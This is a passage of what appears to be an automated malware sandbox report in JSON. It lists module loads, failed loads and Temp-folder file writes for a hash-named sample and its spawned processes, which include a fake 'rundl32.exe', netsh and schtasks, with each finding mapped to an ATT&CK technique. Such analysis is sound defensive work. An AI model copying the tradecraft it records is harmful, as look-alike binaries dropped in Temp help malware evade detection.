\"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"CRYPT32.DLL\" at base 75b50000\n \"rundl32.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"rundl32.exe\" loaded module \"USERENV.DLL\" at base 75d10000\n \"rundl32.exe\" loaded module \"GPAPI.DLL\" at base 74fd0000\n \"Stable_Network.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"Stable_Network.exe\" loaded module \"DWMAPI.DLL\" at base 744b0000\n \"Stable_Network.exe\" loaded module \"COMCTL32.DLL\" at base 748f0000\n \"Stable_Network.exe\" loaded module \"UXTHEME.DLL\" at base 744f0000\n \"Stable_Network.exe\" loaded module \"IMM32.DLL\" at base 775b0000\n \"Stable_Network.exe\" loaded module \"COMCTL32\" at base 748f0000\n \"Stable_Network.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"Stable_Network.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"Stable_Network.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"Stable_Network.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f80000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMDISP.DLL\" at base 6a650000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 76060000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMPROX.DLL\" at base 6d7d0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WMIUTILS.DLL\" at base 6d300000\n \"Stable_Network.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"Stable_Network.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"Stable_Network.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"Stable_Network.exe\" loaded module \"CRYPTSP.DLL\" at base 75400000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75190000\n \"Stable_Network.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"Stable_Network.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75990000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6f370000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6db20000\n \"Stable_Network.exe\" loaded module \"SXS.DLL\" at base 758f0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINHTTP.DLL\" at base 71fe0000\n \"Stable_Network.exe\" loaded module \"SHLWAPI.DLL\" at base 75f20000\n \"Stable_Network.exe\" loaded module \"OLEAUT32.DLL\" at base 77510000\n \"Stable_Network.exe\" loaded module \"WINHTTP.DLL\" at base 71fe0000\n \"Stable_Network.exe\" loaded module \"WS2_32.DLL\" at base 775e0000\n \"Stable_Network.exe\" loaded module \"SSPICLI.DLL\" at base 75880000\n \"Stable_Network.exe\" loaded module \"CREDSSP.DLL\" at base 750c0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 753c0000\n \"Stable_Network.exe\" loaded module \"WSHTCPIP\" at base 74f20000\n \"Stable_Network.exe\" loaded module \"WSHIP6.DLL\" at base 753b0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHQOS.DLL\" at base 6f570000\n \"Stable_Network.exe\" loaded module \"DNSAPI.DLL\" at base 75280000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74f20000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 753b0000\n \"Stable_Network.exe\" loaded module \"IPHLPAPI.DLL\" at base 726e0000\n \"Stable_Network.exe\" loaded module \"RASADHLP.DLL\" at base 6d1f0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71a00000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 75200000\n \"Stable_Network.exe\" loaded module \"SECUR32.DLL\" at base 75720000\n \"Stable_Network.exe\" loaded module \"NCRYPT.DLL\" at base 75530000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 750d0000\n \"Stable_Network.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"Stable_Network.exe\" loaded module \"CRYPT32.DLL\" at base 75b50000\n \"Stable_Network.exe\" loaded module \"USERENV.DLL\" at base 75d10000\n \"Stable_Network.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"Stable_Network.exe\" loaded module \"GPAPI.DLL\" at base 74fd0000\n \"Stable_Network.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76110000\n \"Stable_Network.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76110000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MLANG.DLL\" at base 6c1e0000\n \"Stable_Network.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758a0000\n \"host.exe\" loaded module \"GDI32.DLL\" at base 77c50000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 775b0000\n \"host.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72080000\n \"host.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"host.exe\" loaded module \"KERNEL32\" at base 75f80000\n \"host.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"host.exe\" loaded module \"SHLWAPI.DLL\" at base 75f20000\n \"host.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"host.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"host.exe\" loaded module \"VERSION.DLL\" at base 74e90000\n \"host.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORWKS.DLL\" at base 65240000\n \"host.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"host.exe\" loaded module \"MSCOREE.DLL\" at base 6c3b0000\n \"host.exe\" loaded module \"NTDLL\" at base 77af0000\n \"host.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"host.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"host.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"host.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"host.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"host.exe\" loaded module \"PROFAPI.DLL\" at base 75a10000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MSCORLIB\\9F895C66454577EFF9C77442D0C84F71\\MSCORLIB.NI.DLL\" at base 64740000\n \"host.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\OLE32.DLL\" at base 0\n \"host.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"host.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORJIT.DLL\" at base 6aad0000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM\\AD92DAB7F418877D6A1E0358CE35658A\\SYSTEM.NI.DLL\" at base 63f90000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MICROSOFT.VISUALBAS#\\6F5BF6427122BFC30B5BE76BCD651018\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 62230000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.DRAWING\\CE3C98F2BF220EF17B0CF4233CAC6CEB\\SYSTEM.DRAWING.NI.DLL\" at base 60520000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.WINDOWS.FORMS\\367E5B8A038AC76EBA17528BB7B3688E\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 5f940000\n \"host.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\2.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"host.exe\" loaded module \"PROPSYS.DLL\" at base 74730000\n \"host.exe\" loaded module \"COMCTL32.DLL\" at base 748f0000\n \"host.exe\" loaded module \"OLEAUT32.DLL\" at base 77510000\n \"host.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74730000\n \"host.exe\" loaded module \"NTMARTA.DLL\" at base 74e60000\n \"host.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75a80000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 77170000\n \"host.exe\" loaded module \"SECUR32.DLL\" at base 75720000\n \"host.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"host.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75ac0000\n \"host.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fe40000\n \"host.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f80000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758a0000\n \"host.exe\" loaded module \"SETUPAPI.DLL\" at base 77370000\n \"host.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"host.exe\" loaded module \"CRYPTSP.DLL\" at base 75400000\n \"host.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75190000\n \"dw20.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"dw20.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"dw20.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"dw20.exe\" loaded module \"SENSAPI.DLL\" at base 6d0c0000\n \"GameSDK.exe\" loaded module \"GDI32.DLL\" at base 77c50000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 775b0000\n \"GameSDK.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72080000\n \"GameSDK.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"GameSDK.exe\" loaded module \"KERNEL32\" at base 75f80000\n \"GameSDK.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"GameSDK.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6aa80000\n \"GameSDK.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6c320000\n \"GameSDK.exe\" loaded module \"SHLWAPI.DLL\" at base 75f20000\n \"GameSDK.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"GameSDK.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"GameSDK.exe\" loaded module \"VERSION.DLL\" at base 74e90000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORWKS.DLL\" at base 65240000\n \"GameSDK.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"GameSDK.exe\" loaded module \"MSCOREE.DLL\" at base 6c3b0000\n \"GameSDK.exe\" loaded module \"NTDLL\" at base 77af0000\n \"GameSDK.exe\" loaded module \"SHELL32.DLL\" at base 764c0000\n \"GameSDK.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"GameSDK.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"GameSDK.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76110000\n \"GameSDK.exe\" loaded module \"PROFAPI.DLL\" at base 75a10000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MSCORLIB\\9F895C66454577EFF9C77442D0C84F71\\MSCORLIB.NI.DLL\" at base 5fbb0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\OLE32.DLL\" at base 0\n \"GameSDK.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V2.0.50727\\MSCORJIT.DLL\" at base 6a5f0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM\\AD92DAB7F418877D6A1E0358CE35658A\\SYSTEM.NI.DLL\" at base 64a90000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\MICROSOFT.VISUALBAS#\\6F5BF6427122BFC30B5BE76BCD651018\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 648f0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.DRAWING\\CE3C98F2BF220EF17B0CF4233CAC6CEB\\SYSTEM.DRAWING.NI.DLL\" at base 64760000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.WINDOWS.FORMS\\367E5B8A038AC76EBA17528BB7B3688E\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 5efd0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758a0000\n \"GameSDK.exe\" loaded module \"SHFOLDER.DLL\" at base 69f10000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.CONFIGURATION\\AD8DD536906E94C4BC9CB9B82285580B\\SYSTEM.CONFIGURATION.NI.DLL\" at base 643c0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V2.0.50727_32\\SYSTEM.XML\\77C1DC46EA139BF5E1EAA9B87EF03C7A\\SYSTEM.XML.NI.DLL\" at base 5ea90000\n \"GameSDK.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\2.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"GameSDK.exe\" loaded module \"WS2_32.DLL\" at base 775e0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 753c0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74f20000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 753b0000\n \"GameSDK.exe\" loaded module \"DNSAPI.DLL\" at base 75280000\n \"GameSDK.exe\" loaded module \"IPHLPAPI.DLL\" at base 726e0000\n \"GameSDK.exe\" loaded module \"RASADHLP.DLL\" at base 6d1f0000\n \"GameSDK.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71a00000\n \"netsh.exe\" loaded module \"WSHELPER.DLL\" at base 6c980000\n \"netsh.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"netsh.exe\" loaded module \"NSHHTTP.DLL\" at base 6c2c0000\n \"netsh.exe\" loaded module \"FWCFG.DLL\" at base 6a5d0000\n \"netsh.exe\" loaded module \"AUTHFWCFG.DLL\" at base 68a20000\n \"netsh.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f80000\n \"netsh.exe\" loaded module \"IFMON.DLL\" at base 6bee0000\n \"netsh.exe\" loaded module \"NETIOHLP.DLL\" at base 644f0000\n \"netsh.exe\" loaded module \"WHHELPER.DLL\" at base 68d10000\n \"netsh.exe\" loaded module \"HNETMON.DLL\" at base 689d0000\n \"netsh.exe\" loaded module \"RPCNSH.DLL\" at base 689c0000\n \"netsh.exe\" loaded module \"DOT3CFG.DLL\" at base 643a0000\n \"netsh.exe\" loaded module \"NAPMONTR.DLL\" at base 642c0000\n \"netsh.exe\" loaded module \"NSHIPSEC.DLL\" at base 64200000\n \"netsh.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"netsh.exe\" loaded module \"NETTRACE.DLL\" at base 640a0000\n \"netsh.exe\" loaded module \"WCNNETSH.DLL\" at base 63fb0000\n \"netsh.exe\" loaded module \"P2PNETSH.DLL\" at base 623a0000\n \"netsh.exe\" loaded module \"WLANCFG.DLL\" at base 5ea60000\n \"netsh.exe\" loaded module \"WWANCFG.DLL\" at base 73d20000\n \"netsh.exe\" loaded module \"PEERDISTSH.DLL\" at base 5e9b0000\n \"netsh.exe\" loaded module \"OLE32.DLL\" at base 75dc0000\n \"netsh.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"netsh.exe\" loaded module \"CRYPTSP.DLL\" at base 75400000\n \"netsh.exe\" loaded module \"USER32.DLL\" at base 776c0000\n \"netsh.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\QAGENT.DLL\" at base 6c570000\n \"netsh.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75190000\n \"netsh.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75990000\n \"netsh.exe\" loaded module \"HTTPAPI.DLL\" at base 6dbf0000\n \"netsh.exe\" loaded module \"USERENV.DLL\" at base 75d10000\n \"netsh.exe\" loaded module \"GPAPI.DLL\" at base 74fd0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 750d0000\n \"netsh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FIREWALLAPI.DLL\" at base 74ea0000\n \"netsh.exe\" loaded module \"OLEAUT32.DLL\" at base 77510000\n \"netsh.exe\" loaded module \"SHLWAPI.DLL\" at base 75f20000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 72080000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"schtasks.exe\" loaded module \"KERNEL32\" at base 75f80000\n \"schtasks.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"schtasks.exe\" loaded module \"KERNEL32.DLL\" at base 75f80000\n \"schtasks.exe\" loaded module \"CRYPTBASE.DLL\" at base 75980000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 744f0000\n \"schtasks.exe\" loaded module \"RPCRT4.DLL\" at base 772c0000\n \"schtasks.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76110000\n \"schtasks.exe\" loaded module \"ADVAPI32.DLL\" at base 76060000\n \"schtasks.exe\" loaded module \"CLBCATQ.DLL\" at base 75d30000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TASKSCHD.DLL\" at base 74000000\n \"schtasks.exe\" loaded module \"SSPICLI.DLL\" at base 75880000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" - [base:0; Status:c0000135]\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" failed to load missing module \"%WINDIR%\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" failed to load missing module \"%WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\VERSION.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"rundl32.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" - [base:0; Status:c0000135]\n \"host.exe\" failed to load missing module \"%WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\" - [base:0; Status:c0000135]\n \"GameSDK.exe\" failed to load missing module \"%WINDIR%\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"8ed88d0ec75536f630adf76d4639a2d1da00311b25ad0bc151384559db840879.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\rundl32.exe\"\n \"Stable_Network.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\aut3301.tmp\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ea66a@ADVAPI32.dll\"\n \"0e000f00703fa66a@ADVAPI32.dll\"\n \"0e000f00cc3fa66a@ADVAPI32.dll\"\n \"11001200b447a66a@ADVAPI32.dll\"\n \"110012004848a66a@ADVAPI32.dll\"\n \"120013008c48a66a@ADVAPI32.dll\"\n \"12001300e448a66a@ADVAPI32.dll\"\n \"14001500386ea66a@ADVAPI32.dll\"\n \"14001500506ea66a@ADVAPI32.dll\"\n \"14001500686ea66a@ADVAPI32.dll\"\n \"17001800806ea66a@ADVAPI32.dll\"\n \"0d000e00986ea66a@ADVAPI32.dll\"\n \"11001200a86ea66a@ADVAPI32.dll\"\n \"11001200bc6ea66a@ADVAPI32.dll\"\n \"0f001000fc6fa66a@ADVAPI32.dll\"\n 